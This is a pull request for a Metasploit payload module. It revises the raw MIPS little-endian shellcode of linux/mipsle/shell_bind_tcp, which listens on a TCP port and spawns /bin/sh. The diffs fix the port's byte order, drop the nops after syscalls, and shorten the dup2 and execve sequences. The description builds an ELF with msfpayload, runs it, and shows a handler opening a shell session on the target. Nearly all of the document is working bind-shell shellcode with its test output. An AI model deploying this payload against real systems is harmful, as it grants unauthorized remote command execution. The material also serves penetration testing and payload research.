### PR TITLE
Review the mipsle shell_bind_tcp shellcode

### DIFF
--- a/modules/payloads/singles/linux/mipsle/shell_bind_tcp.rb
+++ b/modules/payloads/singles/linux/mipsle/shell_bind_tcp.rb
@@ -80,17 +80,13 @@ module Metasploit3
     "\xff\xff\x50\x30" + #     andi    s0,v0,0xffff
     "\x25\x20\x10\x02" + #     or      a0,s0,s0
     "\xfd\xff\x0f\x24" + #     li      t7,-3
-    "\x27\x28\xe0\x01" + #     nor     a1,t7,zero
-    "\xdf\x0f\x02\x24" + #     li      v0,4063 ( __NR_dup2 )
-    "\x0c\x01\x01\x01" + #     syscall
-    "\x25\x20\x10\x02" + #     or      a0,s0,s0
-    "\x01\x01\x05\x28" + #     slti    a1,zero,0x0101
-    "\xdf\x0f\x02\x24" + #     li      v0,4063 ( __NR_dup2 )
-    "\x0c\x01\x01\x01" + #     syscall
-    "\x25\x20\x10\x02" + #     or      a0,s0,s0
-    "\xff\xff\x05\x28" + #     slti    a1,zero,-1
-    "\xdf\x0f\x02\x24" + #     li      v0,4063 ( __NR_dup2 )
-    "\x0c\x01\x01\x01" + #     syscall
+    "\x27\x78\xe0\x01" + #     nor     t7,t7,zero
+    "\x21\x28\xe0\x01" + #     move    a1,t7   # dup2_loop
+    "\xdf\x0f\x02\x24" + #     li      v0,4063 # sys_dup2
+    "\x0c\x01\x01\x01" + #     syscall 0x40404
+    "\xff\xff\x10\x24" + #     li      s0,-1
+    "\xff\xff\xef\x21" + #     addi    t7,t7,-1
+    "\xfa\xff\xf0\x15" + #     bne     t7,s0,dup2_loop
     "\x50\x73\x06\x24" + #     li      a2,0x7350
     "\xff\xff\xd0\x04" + # LB: bltzal  a2,LB
     "\x50\x73\x0f\x24" + #     li      t7,0x7350 (nop)

--- a/modules/payloads/singles/linux/mipsle/shell_bind_tcp.rb
+++ b/modules/payloads/singles/linux/mipsle/shell_bind_tcp.rb
@@ -58,7 +58,7 @@ module Metasploit3
     "\xff\xff\x50\x30" + #     andi    s0,v0,0xffff
     "\xef\xff\x0e\x24" + #     li      t6,-17                        ; t6: 0xffffffef
     "\x27\x70\xc0\x01" + #     nor     t6,t6,zero                    ; t6: 0x10 (16)
-    port.pack("C2") + "\x0d\x24" +  #     li      t5,0xFFFF (port)   ; t5: 0x5c11
+    port.pack("C2") + "\x0d\x24" +  #     li      t5,0xFFFF (port)   ; t5: 0x5c11 (0x115c == 4444 (default LPORT))
     "\x04\x68\xcd\x01" + #     sllv    t5,t5,t6                      ; t5: 0x5c110000
     "\xfd\xff\x0e\x24" + #     li      t6,-3                         ; t6: -3
     "\x27\x70\xc0\x01" + #     nor     t6,t6,zero                    ; t6: 0x2

--- a/modules/payloads/singles/linux/mipsle/shell_bind_tcp.rb
+++ b/modules/payloads/singles/linux/mipsle/shell_bind_tcp.rb
@@ -111,6 +111,7 @@ module Metasploit3
     "\xab\x0f\x02\x24" + #     li v0,4011 ( __NR_execve )
     "\x0c\x01\x01\x01"   #     syscall 0x40404
 
+    return super + shellcode
   end
 
 end

--- a/modules/payloads/singles/linux/mipsle/shell_bind_tcp.rb
+++ b/modules/payloads/singles/linux/mipsle/shell_bind_tcp.rb
@@ -46,8 +46,6 @@ module Metasploit3
     port = Integer(datastore['LPORT'])
     port = [port].pack("n").unpack("cc");
 
-    # based on vaicebine at gmail dot com shellcode
-    # and scut paper Writing MIPS/Irix shellcode
     shellcode =
     "\xe0\xff\xbd\x27" + #     addiu   sp,sp,-32
     "\xfd\xff\x0e\x24" + #     li      t6,-3

--- a/modules/payloads/singles/linux/mipsle/shell_bind_tcp.rb
+++ b/modules/payloads/singles/linux/mipsle/shell_bind_tcp.rb
@@ -23,7 +23,7 @@ module Metasploit3
           'scut',             # Original mips-irix-portshell shellcode
           'vaicebine',        # Original shellcode mod
           'Vlatko Kosturjak', # Metasploit module
-          'juan vazquez'      # Optimizations
+          'juan vazquez'      # Small fixes and optimizations
         ],
       'License'       => MSF_LICENSE,
       'Platform'      => 'linux',
@@ -85,16 +85,16 @@ module Metasploit3
     "\x48\x10\x02\x24" + #     li      v0,4168 ( __NR_accept )
     "\x0c\x01\x01\x01" + #     syscall
 
-    "\xff\xff\x50\x30" + #     andi    s0,v0,0xffff
-    "\x25\x20\x10\x02" + #     or      a0,s0,s0
-    "\xfd\xff\x0f\x24" + #     li      t7,-3
-    "\x27\x78\xe0\x01" + #     nor     t7,t7,zero
-    "\x21\x28\xe0\x01" + #     move    a1,t7   # dup2_loop
-    "\xdf\x0f\x02\x24" + #     li      v0,4063 # sys_dup2
+    "\xff\xff\xa2\xaf" + #     sw v0,-1(sp) # socket
+    "\xfd\xff\x0f\x24" + #     li t7,-3
+    "\x27\x78\xe0\x01" + #     nor t7,t7,zero
+    "\xff\xff\xa4\x8f" + #     lw a0,-1(sp)
+    "\x21\x28\xe0\x01" + #     move a1,t7   # dup2_loop
+    "\xdf\x0f\x02\x24" + #     li v0,4063 ( __NR_dup2 )
     "\x0c\x01\x01\x01" + #     syscall 0x40404
-    "\xff\xff\x10\x24" + #     li      s0,-1
-    "\xff\xff\xef\x21" + #     addi    t7,t7,-1
-    "\xfa\xff\xf0\x15" + #     bne     t7,s0,dup2_loop
+    "\xff\xff\x10\x24" + #     li s0,-1
+    "\xff\xff\xef\x21" + #     addi t7,t7,-1
+    "\xfa\xff\xf0\x15" + #     bne t7,s0,<dup2_loop>
 
     "\x50\x73\x06\x24" + #     li      a2,0x7350
     "\xff\xff\xd0\x04" + # LB: bltzal  a2,LB

--- a/modules/payloads/singles/linux/mipsle/shell_bind_tcp.rb
+++ b/modules/payloads/singles/linux/mipsle/shell_bind_tcp.rb
@@ -50,7 +50,6 @@ module Metasploit3
     "\xff\xff\x06\x28" + #     slti    a2,zero,-1
     "\x57\x10\x02\x24" + #     li      v0,4183 ( __NR_socket )
     "\x0c\x01\x01\x01" + #     syscall
-    "\x50\x73\x0f\x24" + #     li      t7,0x7350 (nop)
     "\xff\xff\x50\x30" + #     andi    s0,v0,0xffff
     "\xef\xff\x0e\x24" + #     li      t6,-17
     "\x27\x70\xc0\x01" + #     nor     t6,t6,zero
@@ -69,35 +68,29 @@ module Metasploit3
     "\xe0\xff\xa5\x23" + #     addi    a1,sp,-32
     "\x49\x10\x02\x24" + #     li      v0,4169 ( __NR_bind )A
     "\x0c\x01\x01\x01" + #     syscall
-    "\x50\x73\x0f\x24" + #     li      t7,0x7350 (nop)
     "\x25\x20\x10\x02" + #     or      a0,s0,s0
     "\x01\x01\x05\x24" + #     li      a1,257
     "\x4e\x10\x02\x24" + #     li      v0,4174 ( __NR_listen )
     "\x0c\x01\x01\x01" + #     syscall
-    "\x50\x73\x0f\x24" + #     li      t7,0x7350 (nop)
     "\x25\x20\x10\x02" + #     or      a0,s0,s0
     "\xff\xff\x05\x28" + #     slti    a1,zero,-1
     "\xff\xff\x06\x28" + #     slti    a2,zero,-1
     "\x48\x10\x02\x24" + #     li      v0,4168 ( __NR_accept )
     "\x0c\x01\x01\x01" + #     syscall
-    "\x50\x73\x0f\x24" + #     li      t7,0x7350 (nop)
     "\xff\xff\x50\x30" + #     andi    s0,v0,0xffff
     "\x25\x20\x10\x02" + #     or      a0,s0,s0
     "\xfd\xff\x0f\x24" + #     li      t7,-3
     "\x27\x28\xe0\x01" + #     nor     a1,t7,zero
     "\xdf\x0f\x02\x24" + #     li      v0,4063 ( __NR_dup2 )
     "\x0c\x01\x01\x01" + #     syscall
-    "\x50\x73\x0f\x24" + #     li      t7,0x7350 (nop)
     "\x25\x20\x10\x02" + #     or      a0,s0,s0
     "\x01\x01\x05\x28" + #     slti    a1,zero,0x0101
     "\xdf\x0f\x02\x24" + #     li      v0,4063 ( __NR_dup2 )
     "\x0c\x01\x01\x01" + #     syscall
-    "\x50\x73\x0f\x24" + #     li      t7,0x7350 (nop)
     "\x25\x20\x10\x02" + #     or      a0,s0,s0
     "\xff\xff\x05\x28" + #     slti    a1,zero,-1
     "\xdf\x0f\x02\x24" + #     li      v0,4063 ( __NR_dup2 )
     "\x0c\x01\x01\x01" + #     syscall
-    "\x50\x73\x0f\x24" + #     li      t7,0x7350 (nop)
     "\x50\x73\x06\x24" + #     li      a2,0x7350
     "\xff\xff\xd0\x04" + # LB: bltzal  a2,LB
     "\x50\x73\x0f\x24" + #     li      t7,0x7350 (nop)

--- a/modules/payloads/singles/linux/mipsle/shell_bind_tcp.rb
+++ b/modules/payloads/singles/linux/mipsle/shell_bind_tcp.rb
@@ -86,34 +86,31 @@ module Metasploit3
     "\x0c\x01\x01\x01" + #     syscall
 
     "\xff\xff\xa2\xaf" + #     sw v0,-1(sp) # socket
-    "\xfd\xff\x0f\x24" + #     li t7,-3
-    "\x27\x78\xe0\x01" + #     nor t7,t7,zero
+    "\xfd\xff\x11\x24" + #     li s1,-3
+    "\x27\x88\x20\x02" + #     nor s1,s1,zero
     "\xff\xff\xa4\x8f" + #     lw a0,-1(sp)
-    "\x21\x28\xe0\x01" + #     move a1,t7   # dup2_loop
+    "\x21\x28\x20\x02" + #     move a1,s1 # dup2_loop
     "\xdf\x0f\x02\x24" + #     li v0,4063 ( __NR_dup2 )
     "\x0c\x01\x01\x01" + #     syscall 0x40404
     "\xff\xff\x10\x24" + #     li s0,-1
-    "\xff\xff\xef\x21" + #     addi t7,t7,-1
-    "\xfa\xff\xf0\x15" + #     bne t7,s0,<dup2_loop>
+    "\xff\xff\x31\x22" + #     addi s1,s1,-1
+    "\xfa\xff\x30\x16" + #     bne s1,s0 <dup2_loop>
 
-    "\x50\x73\x06\x24" + #     li      a2,0x7350
-    "\xff\xff\xd0\x04" + # LB: bltzal  a2,LB
-    "\x50\x73\x0f\x24" + #     li      t7,0x7350 (nop)
-    "\xff\xff\x06\x28" + #     slti    a2,zero,-1
-    "\xc7\xff\x0f\x24" + #     li      t7,-57
-    "\x27\x78\xe0\x01" + #     nor     t7,t7,zero
-    "\x21\x20\xef\x03" + #     addu    a0,ra,t7
-    "\xf0\xff\xa4\xaf" + #     sw      a0,-16(sp)
-    "\xf4\xff\xa0\xaf" + #     sw      zero,-12(sp)
-    "\xf7\xff\x0e\x24" + #     li      t6,-9
-    "\x27\x70\xc0\x01" + #     nor     t6,t6,zero
-    "\x21\x60\xef\x03" + #     addu    t4,ra,t7
-    "\x21\x68\x8e\x01" + #     addu    t5,t4,t6
-    "\xff\xff\xa0\xad" + #     sw      zero,-1(t5)
-    "\xf0\xff\xa5\x23" + #     addi    a1,sp,-16
-    "\xab\x0f\x02\x24" + #     li      v0,4011 ( __NR_execve )
-    "\x0c\x01\x01\x01" + #     syscall
-    "/bin/sh"
+    "\xff\xff\x06\x28" + #     slti a2,zero,-1
+    "\x62\x69\x0f\x3c" + #     lui t7,0x2f2f "bi"
+    "\x2f\x2f\xef\x35" + #     ori t7,t7,0x6269 "//"
+    "\xec\xff\xaf\xaf" + #     sw t7,-20(sp)
+    "\x73\x68\x0e\x3c" + #     lui t6,0x6e2f "sh"
+    "\x6e\x2f\xce\x35" + #     ori t6,t6,0x7368 "n/"
+    "\xf0\xff\xae\xaf" + #     sw t6,-16(sp)
+    "\xf4\xff\xa0\xaf" + #     sw zero,-12(sp)
+    "\xec\xff\xa4\x27" + #     addiu a0,sp,-20
+    "\xf8\xff\xa4\xaf" + #     sw a0,-8(sp)
+    "\xfc\xff\xa0\xaf" + #     sw zero,-4(sp)
+    "\xf8\xff\xa5\x27" + #     addiu a1,sp,-8
+    "\xab\x0f\x02\x24" + #     li v0,4011 ( __NR_execve )
+    "\x0c\x01\x01\x01"   #     syscall 0x40404
+
   end
 
 end

--- a/modules/payloads/singles/linux/mipsle/shell_bind_tcp.rb
+++ b/modules/payloads/singles/linux/mipsle/shell_bind_tcp.rb
@@ -56,13 +56,13 @@ module Metasploit3
     "\x0c\x01\x01\x01" + #     syscall
 
     "\xff\xff\x50\x30" + #     andi    s0,v0,0xffff
-    "\xef\xff\x0e\x24" + #     li      t6,-17
-    "\x27\x70\xc0\x01" + #     nor     t6,t6,zero
-    port.pack("C2") + "\x0d\x24" +  #     li      t5,0xFFFF (port)
-    "\x04\x68\xcd\x01" + #     sllv    t5,t5,t6
-    "\xff\xfd\x0e\x24" + #     li      t6,-513
-    "\x27\x70\xc0\x01" + #     nor     t6,t6,zero
-    "\x25\x68\xae\x01" + #     or      t5,t5,t6
+    "\xef\xff\x0e\x24" + #     li      t6,-17                        ; t6: 0xffffffef
+    "\x27\x70\xc0\x01" + #     nor     t6,t6,zero                    ; t6: 0x10 (16)
+    port.pack("C2") + "\x0d\x24" +  #     li      t5,0xFFFF (port)   ; t5: 0x5c11
+    "\x04\x68\xcd\x01" + #     sllv    t5,t5,t6                      ; t5: 0x5c110000
+    "\xfd\xff\x0e\x24" + #     li      t6,-3                         ; t6: -3
+    "\x27\x70\xc0\x01" + #     nor     t6,t6,zero                    ; t6: 0x2
+    "\x25\x68\xae\x01" + #     or      t5,t5,t6                      ; t5: 0x5c110002
     "\xe0\xff\xad\xaf" + #     sw      t5,-32(sp)
     "\xe4\xff\xa0\xaf" + #     sw      zero,-28(sp)
     "\xe8\xff\xa0\xaf" + #     sw      zero,-24(sp)

--- a/modules/payloads/singles/linux/mipsle/shell_bind_tcp.rb
+++ b/modules/payloads/singles/linux/mipsle/shell_bind_tcp.rb
@@ -18,7 +18,13 @@ module Metasploit3
     super(merge_info(info,
       'Name'          => 'Linux Command Shell, Bind TCP Inline',
       'Description'   => 'Listen for a connection and spawn a command shell',
-      'Author'        => 'Vlatko Kosturjak',
+      'Author'        =>
+        [
+          'scut',             # Original mips-irix-portshell shellcode
+          'vaicebine',        # Original shellcode mod
+          'Vlatko Kosturjak', # Metasploit module
+          'juan vazquez'      # Optimizations
+        ],
       'License'       => MSF_LICENSE,
       'Platform'      => 'linux',
       'Arch'          => ARCH_MIPSLE,
@@ -50,6 +56,7 @@ module Metasploit3
     "\xff\xff\x06\x28" + #     slti    a2,zero,-1
     "\x57\x10\x02\x24" + #     li      v0,4183 ( __NR_socket )
     "\x0c\x01\x01\x01" + #     syscall
+
     "\xff\xff\x50\x30" + #     andi    s0,v0,0xffff
     "\xef\xff\x0e\x24" + #     li      t6,-17
     "\x27\x70\xc0\x01" + #     nor     t6,t6,zero
@@ -68,15 +75,18 @@ module Metasploit3
     "\xe0\xff\xa5\x23" + #     addi    a1,sp,-32
     "\x49\x10\x02\x24" + #     li      v0,4169 ( __NR_bind )A
     "\x0c\x01\x01\x01" + #     syscall
+
     "\x25\x20\x10\x02" + #     or      a0,s0,s0
     "\x01\x01\x05\x24" + #     li      a1,257
     "\x4e\x10\x02\x24" + #     li      v0,4174 ( __NR_listen )
     "\x0c\x01\x01\x01" + #     syscall
+
     "\x25\x20\x10\x02" + #     or      a0,s0,s0
     "\xff\xff\x05\x28" + #     slti    a1,zero,-1
     "\xff\xff\x06\x28" + #     slti    a2,zero,-1
     "\x48\x10\x02\x24" + #     li      v0,4168 ( __NR_accept )
     "\x0c\x01\x01\x01" + #     syscall
+
     "\xff\xff\x50\x30" + #     andi    s0,v0,0xffff
     "\x25\x20\x10\x02" + #     or      a0,s0,s0
     "\xfd\xff\x0f\x24" + #     li      t7,-3
@@ -87,6 +97,7 @@ module Metasploit3
     "\xff\xff\x10\x24" + #     li      s0,-1
     "\xff\xff\xef\x21" + #     addi    t7,t7,-1
     "\xfa\xff\xf0\x15" + #     bne     t7,s0,dup2_loop
+
     "\x50\x73\x06\x24" + #     li      a2,0x7350
     "\xff\xff\xd0\x04" + # LB: bltzal  a2,LB
     "\x50\x73\x0f\x24" + #     li      t7,0x7350 (nop)

--- a/spec/msfvenom_spec.rb
+++ b/spec/msfvenom_spec.rb
@@ -190,9 +190,10 @@ describe MsfVenom do
         it "should contain /bin/sh" do
           output = venom.generate_raw_payload
           # Usually push'd in two instructions, so the whole string
-          # isn't all together. Check for the two pieces seperately
-          output.should include("/sh")
-          output.should include("/bin")
+          # isn't all together. Check for the two pieces seperately.
+          # Also should have into account payloads using imm16 moves.
+          output.should include("sh")
+          output.should include("bi")
         end
       end
 


### PR DESCRIPTION
- Fix endianess problem on the bind call
- Save some bytes by deleting delay slots after syscall since as far as I've tested they aren't needed
- Save some bytes by optimizing the dup2 and execve calls
## Verification
- [x] Use msfpayload to generate and ELF with the payload embedded

```
$ ./msfpayload linux/mipsle/shell_bind_tcp RHOST=192.168.172.134 LPORT=4444 X > /tmp/shell.elf
Created by msfpayload (http://www.metasploit.com).
Payload: linux/mipsle/shell_bind_tcp
 Length: 232
Options: {"RHOST"=>"192.168.172.134", "RPORT"=>"4444"}
```
- [ ] Upload the shell.elf to an mipsle machine, provide +x permissions and execute:

```
juan@debian:~$ chmod +x shell.elf 
juan@debian:~$ ./shell.elf 
```
- [ ] Run the msfconsole, use exploit/multi/handler with the shell_bind_tcp payload and exploit, you should get a session:

```
msf exploit(handler) > show options

Module options (exploit/multi/handler):

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------


Payload options (linux/mipsle/shell_bind_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LPORT  4444             yes       The listen port
   RHOST  192.168.172.134  no        The target address


Exploit target:

   Id  Name
   --  ----
   0   Wildcard Target

msf exploit(handler) > exploit

[*] Started bind handler
[*] Starting the payload handler...
[*] Command shell session 6 opened (192.168.172.1:57104 -> 192.168.172.134:4444) at 2014-01-08 12:35:56 -0600
u
^R
uname -a
Linux debian 2.6.32-5-4kc-malta #1 Fri Feb 15 18:09:19 UTC 2013 mips GNU/Linux
id
uid=1000(juan) gid=1000(juan) groups=1000(juan),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev)
^C
Abort session 6? [y/N]  y

[*] 192.168.172.134 - Command shell session 6 closed.  Reason: User exit
msf exploit(handler) > 
```
